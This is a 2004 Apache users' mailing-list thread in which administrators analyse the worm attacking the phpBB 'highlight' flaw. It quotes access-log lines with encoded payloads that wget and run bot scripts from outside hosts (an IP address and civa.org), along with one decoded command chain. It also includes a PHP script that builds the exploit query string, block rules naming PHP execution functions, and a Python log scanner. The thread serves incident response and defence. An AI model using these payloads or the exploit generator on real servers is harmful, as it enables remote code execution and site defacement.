>>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
>>revealed nothing. But, when I did the same search on the new MSN beta search
>>engine, a whopping 36,000 hits showed up. Check it out:
>>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo 
>>rm+Generation%22&FORM=QBRE
>
>At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bo...@fire-world.de> wrote:
>> > We had some vhosts where this worked just fine. On our systems we didn't
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>If you use mod_security, this may help, too:
>>
>>SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>>
>>I had another exploit attempt, with this payload:
>>
>>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET 
>>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3 
>>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31 
>>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D% 
>>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6 
>>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68 
>>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A% 
>>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight= 
>>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41% 
>>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
>>
>>Which decodes to:
>>
>>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
>>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b 
>>*.pl b0t*; echo _END_
>>highlight='.passthru($HTTP_GET_VARS[rush]).'
>>
>>Regards,
>>
>>Sebastian
>
>At 17:21 +0200 22/12/2004, Alexander Klimov <al...@inbox.ru> wrote:
>>
>>It seems that automated exploiting starts soon after disclosure of the
>>vulnerability:
>>
>>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
>>"GET /viewtopic.php?t=50674&highlight=
>>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
>>HTTP/1.1" 404 219
>>
>>Interestingly, we do not use phpbb and in fact do not have 
>>viewtopic.php at all.
>
>At 4:34 +0000 22/12/2004, <yc...@sneakemail.com> wrote:
>>
>>Forgive me if this is a newbie question, but a site I help run was 
>>hit by this, and I'm trying to understand it to protect against 
>>future worms.
>>
>>The worm exploits the phpBB highlight vulnerability.  It uses PHP 
>>to run Perl to write the Perl script file, then executes it.  The 
>>script then proceeds to traverse the entire directory structure, 
>>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi 
>>files, and then spreads itself.  Correct?
>>
>>I have two questions:
>>
>>1.  Why has the worm been as effective on Windows servers as on 
>>*nix servers?  At the very least, shouldn't the difference in file 
>>and directory naming cause a problem?  I looked at the decoded Perl 
>>script, but I'm not a Perl expert, so I couldn't understand all of 
>>it.  And what about the difference in file permissions?
>>
>>2.  More importantly, why wasn't the worm's destructive ability 
>>limited by file permissions, especially on *nix servers?  If, for 
>>example, an HTML file on the server was uploaded by user bob, and 
>>has permissions of 755, how can the Perl script delete that file? 
>>Shouldn't the Perl script be created with the Perl process's 
>>permissions, which was invoked by PHP, which should have the Web 
>>server's permissions, which should be, at least on most *nix 
>>servers, the nobody user?
>>
>>This is a big issue on shared servers, or virtual hosts, whatever 
>>you want to call them.  Our site is on a shared server, and our 
>>site does not even run phpBB, but most of our HTML files were 
>>replaced with the worm's content.  Obviously, then, another site on 
>>the server must have an old version of phpBB.  But why could the 
>>worm, coming in through another site, modify files created by other 
>>users?  Even if the worm's script ran as the owner of the 
>>vulnerable viewtopic.php file, how could it then modify 
>>non-world-writable files created by other users?
>>
>>I have long been concerned with the security of PHP scripts, 
>>especially on shared servers.  Since PHP almost always runs as an 
>>Apache module, and Apache usually runs as nobody, one must make 
>>files and directories world-writable for PHP scripts to be able to 
>>write to them.  But that means that any process on the server, 
>>including anyone's PHP script, can modify the files.
>>
>>Thanks for any insights.
>>
>>Adam Porter
>
>At 21:28 -0600 22/12/2004, Alvin Packard wrote:
>>
>>Last look at my log files and I was hit a total of 421 times by 278
>>different IPs. It seems to be moving rather quickly as these were from
>>the last 2 days. Good luck to those who have not patched yet.
>>
>>Alvin Packard, CWNA
>>www.networksecuritytech.com
>
>At 13:31 +0100 23/12/2004, Anders Henke wrote:
>> > 1.  Why has the worm been as effective on Windows servers as on 
>>*nix servers?  At the very least, shouldn't the difference in file 
>>and directory naming cause a problem?  I looked at the decoded Perl 
>>script, but I'm not a Perl expert, so I couldn't understand all of 
>>it.  And what about the difference in file permissions?
>>
>>Perl does provide cross-platform-functions for e.g. file access and
>>there's usually not much of a difference for running a well-written
>>perl script on Unix as well as on Windows other than the first line
>>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
>>on Unix).
>>
>>However, most Windows-Webservers other than Apache do run any .pl-Script
>>using the installed perl interpreter and don't care about the bang-line.
>>
>>The documentation found in 'perldoc perlport' does give a closer view
>>on the few differences when writing cross-platform perl scripts.
>>
>>> 2.  More importantly, why wasn't the worm's destructive ability 
>>>limited by file permissions, especially on *nix servers?  If, for 
>>>example, an HTML file on the server was uploaded by user bob, and 
>>>has permissions of 755, how can the Perl script delete that file? 
>>>Shouldn't the Perl script be created with the Perl process's 
>>>permissions, which was invoked by PHP, which should have the Web 
>>>server's permissions, which should be, at least on most *nix 
>>>servers, the nobody user?
>>
>>On shared servers with ISPs caring about security, user CGIs are using the
>>suexec mechanism in order to run each customer within his own user's space.
>>
>>The downside of using suexec is that PHP as a CGI doesn't offer a small
>>number of special features some people do believe to be essential, and
>>some people do write code in a way that makes running it on PHP as CGI
>>close to 'virtually impossible'. The PHP-Module also allows one to
>>set PHP-configuration settings via .htaccess; those configuration
>>changes are ignored by CGI-PHP and can severely affect the way
>>a PHP-written application works (or doesn't work).
>>
>>> This is a big issue on shared servers, or virtual hosts, whatever 
>>>you want to call them.  Our site is on a shared server, and our 
>>>site does not even run phpBB, but most of our HTML files were 
>>>replaced with the worm's content.  Obviously, then, another site 
>>>on the server must have an old version of phpBB.  But why could 
>>>the worm, coming in through another site, modify files created by 
>>>other users?  Even if the worm's script ran as the owner of the 
>>>vulnerable viewtopic.php file, how could it then modify 
>>>non-world-writable files created by other users?
>>
>>
>>
>>Right - if everyone were using e.g. suexec, this would be the case.
>>
>>As a web host, you've got to choose to run either CGI-PHP or PHP as
>>module.
>>
>>Your 'power'-users are calling for the module, the admin keeping
>>maintenance on an already overloaded server does also call for the module
>>(the module relieves the web server from forking a separate process for
>>running a php-script), only those security-related ones are rejecting both
>>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
>>
>>If your scripts support the fastcgi extension, one might use mod_fastcgi
>>with suexec support; however, this means one has to setup three softwares
>>(fastcgi, suexec, php) and make them work together instead of the
>>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
>>much work on a secure system, but your users are still calling for mod_php
>>and in case any part of your setup breaks, your whole system is unusable.
>>
>>> I have long been concerned with the security of PHP scripts, 
>>>especially on shared servers.  Since PHP almost always runs as an 
>>>Apache module, and Apache usually runs as nobody, one must make 
>>>files and directories world-writable for PHP scripts to be able to 
>>>write to them.  But that means that any process on the server, 
>>>including anyone's PHP script, can modify the files.
>>
>>
>>Yes, you've got the point.
>>
>>Apache 2 has the ability to run modules per VirtualHost within a different
>>user context (perchild MPM).
>>-According to the Apache documentation, this module is non-functional,
>> not yet finished and development is not currently active.
>>-PHP is certainly one of the most interesting modules for this feature,
>> however, the last time I looked, PHP of all modules didn't support it, and
>> Apache required at least one process running per virtualhost (which in
>> turn would render servers hosting thousands of sites unusable).
>>-Still today, the php documentation warns against using Apache 2.0 with PHP
>> in a production environment.
>>
>>From a security aspect, CGI is currently the only way to run PHP securely
>>(with 'secure' from the view of the administrator).
>>
>>
>>
>>Regards,
>>
>>Anders
>>--
>>Schlund + Partner AG              Security and System Administration
>>Brauerstrasse 48                  v://49.721.91374.50
>>D-76135 Karlsruhe                 f://49.721.91374.225
>
>At 23:34 +0000 22/12/2004, William Geoghegan wrote:
>>
>>A script to check if your phpBB is vulnerable.
>>Anything below 2.0.11 _probably_ is, but in case you're not sure, use
>>this script.
>>
>>The script generates the request parameters, all you need to do is 
>>copy the result onto www.thesite.com/viewtopic.php
>>
>>
>><?
>>$rush='ls -al'; //do what
>>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
>>
>>print "?t=%37&rush=";
>>
>>for ($i=0; $i<strlen($rush); ++$i) {
>> print '%' . bin2hex(substr($rush,$i,1));
>>}
>>
>>print "&highlight=%2527.";
>>
>>for ($i=0; $i<strlen($highlight); ++$i) {
>> print '%' . bin2hex(substr($highlight,$i,1));
>>}
>>
>>print ".%2527";
>>?>
>>
>>Cheers.
>>
>>William Geoghegan
>>
>>GEOTEK Computer Services
>>- www.geotekcs.co.uk -
>
>At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
>>
>>Interestingly enough, the worm was probably developed on *nix and then
>>checked and corrected to work on Windows:
>>
>>	eval{
>>		while(my @a = getpwent()) { push(@dirs, $a[7]);}
>>	};
>>
>>	push(@dirs, '/ ');
>>
>>The getpwent function is not supported on Windows. Actually, the entire
>>loop that gets users' home directories from the /etc/passwd file is very
>>*nix centric.
>>
>>The author found that out, added the eval statement to prevent the
>>script from crashing on Windows and added the root directory in order to
>>have at least one entry on windows. This last line actually makes the
>>entire loop less important.
>>
>>Additionally, on Windows the worm would affect files on a single disk.
>>As to which disk exactly, it probably depends on the web server
>>attacked, and how PHP and Perl are installed and used with the web
>>server. In some cases, if the web sites and the software do not reside
>>on the same disk, the worm payload will not work.
>>
>>
>>Ofer Shezaf, CTO
>>Breach Security, Inc.
>>Deployable Application Security
>>
>>Tel: +972.9.956.0036 ext.212
>>Cell: +972.54.443.1119
>>ofers@breach.com
>
>At 13:59 +0100 23/12/2004, Anders Henke wrote:
>>> If you cannot fix it (virtual servers) fast for all your clients you could
>>> also try with something like this:
>>>
>>>         RewriteEngine On
>>>         RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>>         RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>>         RewriteRule ^.*$                                -               [F]
>>>
>>> We had some vhosts where this worked just fine. On our systems we didn't
>>> see any valid request with echr and esystem; just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>This assumes you're seeing GET-requests, but there are other ways
>>(e.g. POST) to exploit such code.
>>
>>GET-requests are so kind as they do show up in full in the web server's
>>access-log and as such, they do document the full exploit code.
>>E.g. the access logs alone provide enough information for site owner and
>>administrator to find out what exactly is broken and enable them to
>>perform detailed analysis on even previously unknown exploits as well
>>as reject such malicious code within a mod_rewrite RewriteRule.
>>
>>Today, most such exploits are sent using HTTP-GET, but there's a fairly
>>low expense for exploit code coders to run these exploits using HTTP-POST.
>>We're lucky that most exploit code coders haven't chosen the struggle to
>>properly encode their exploit-code HTTP-POST-requests, but still keep
>>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
>>other than rejecting =any= POST-request to 'specific' files like
>>viewtopic.php, which obviously will sooner or later break some application.
>>
>>I've already had a single case where a 'common' insecurity like
>>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
>>so for the administrators out there, it might be a good idea to test and
>>implement mod_security on web servers.
>>As far as I know, the POST-payload analysis of mod_security is currently
>>one of the very few ways to audit and stop potentially malicious
>>HTTP-POST-data from reaching your web server's CGIs.
>
>At 16:10 +0000 24/12/2004, <st...@uptime.org.uk> wrote:
>>
>>>This assumes you're seeing GET-requests, but there are other ways
>>>(e.g. POST) to exploit such code.
>>
>>Whilst I understand your point, it should be noted that this 
>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>the vulnerable data is sourced from $HTTP_GET_VARS.
>
>At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
>>
>>>Whilst I understand your point, it should be noted that this 
>>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>>the vulnerable data is sourced from $HTTP_GET_VARS.
>>
>>And it seems worse, we see even upgraded phpbb2 installs (2.0.11)
>>successfully and actively being exploited.
>>
>>216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET /phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-" "LWP::Simple/5.803"
>>66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET /phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-" "LWP::Simple/5.79"
>>64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET /phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68131 "-" "LWP::Simple/5.63"
>>[24/Dec/2004:19:09:26 +0100] "GET /phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20767 "-" "LWP::Simple/5.803"
>>205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET /phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20875 "-" "LWP::Simple/5.802"
>>
>>Loads of those, and all request the files from civa.org
>>
>>This is on a patched phpbb2, so be aware!!
>
>
>


rgds



>Does anybody have any ideas on this e-mail?  My admin inbox was full
>of these e-mails this morning, I don't know if
>they're for real, or what...  Can someone please advise? There is
>one phpbb running on the server...
>
>
>HEADERS:
>
>Return-Path: <ww...@iris>
>Received: from mail.the-server.net ([unix socket])
>	by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
>X-Sieve: CMU Sieve 2.2
>Received: from localhost (localhost [127.0.0.1])
>	by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
>	Sat, 25 Dec 2004 00:50:23 +0100 (CET)
>Received: from mail.the-server.net ([127.0.0.1])
> by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
>Received: by mail.the-server.net (Postfix, from userid 30)
>	id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
>Date: Sat, 25 Dec 2004 00:48:48 +0100
>To: postmaster, hostmaster, abuse, admin, root
>Subject: YOUR SERVER HAS BEEN HACKED
>Message-ID: <41...@iris.the-server.net>
>User-Agent: nail 10.5 4/27/03
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>From: wwwrun (WWW daemon apache)
>X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
>
>
>MESSAGE BODY:
>
>YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
>
>


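A defender-side check that follows from the access-log lines and the RewriteCond quoted in the thread, added here as an example (it is not code from any of the posters): it strips the nested percent-encoding from each query parameter before looking for PHP execution sinks, and records whether the literal 'echr'/'esystem' patterns of the quoted RewriteCond would have matched the raw query string, which is what %{QUERY_STRING} is compared against. The log lines are constructed for the example and use documentation IP addresses.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in the same access-log shape as the thread's
# examples; 192.0.2.x are documentation addresses, not real indicators.
SAMPLE_LOG = (
    '192.0.2.10 - - [24/Dec/2004:18:42:54 +0100] "GET /phpBB2/viewtopic.php'
    '?t=753&rush=%6C%73&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54'
    '%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"'
    ' 200 12758 "-" "LWP::Simple/5.803"\n'
    '192.0.2.11 - - [24/Dec/2004:18:43:10 +0100] "GET /phpBB2/viewtopic.php'
    '?t=753&highlight=apache+security HTTP/1.1" 200 9876 "-" "Mozilla/5.0"\n'
)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+"')
# PHP execution sinks written as a call; only meaningful after decoding.
SINK_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|eval)\s*\(', re.I)
# The literal substrings of the RewriteCond quoted in the thread, applied to
# the raw (still percent-encoded) query string as %{QUERY_STRING} sees it.
RAW_RULE_RE = re.compile(r'echr|esystem')

def decode_layers(value, max_rounds=3):
    """Strip nested percent-encoding (the payload uses %2527 for a quote)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding dict for one log line, or None if nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('url').partition('?')
    hits = []
    # parse_qs removes one encoding layer; decode_layers removes the rest.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            plain = decode_layers(v)
            if SINK_RE.search(plain):
                hits.append((name, plain))
    if not hits:
        return None
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'path': path,
            'params': hits, 'raw_rule_hit': bool(RAW_RULE_RE.search(query))}

def scan(log_text):
    return [f for f in (inspect_line(l) for l in log_text.splitlines()) if f]
```

Running scan() over a real access log gives one finding per request whose decoded parameters contain a sink call; raw_rule_hit being False on such a finding shows the request would have passed the quoted RewriteCond untouched.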
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org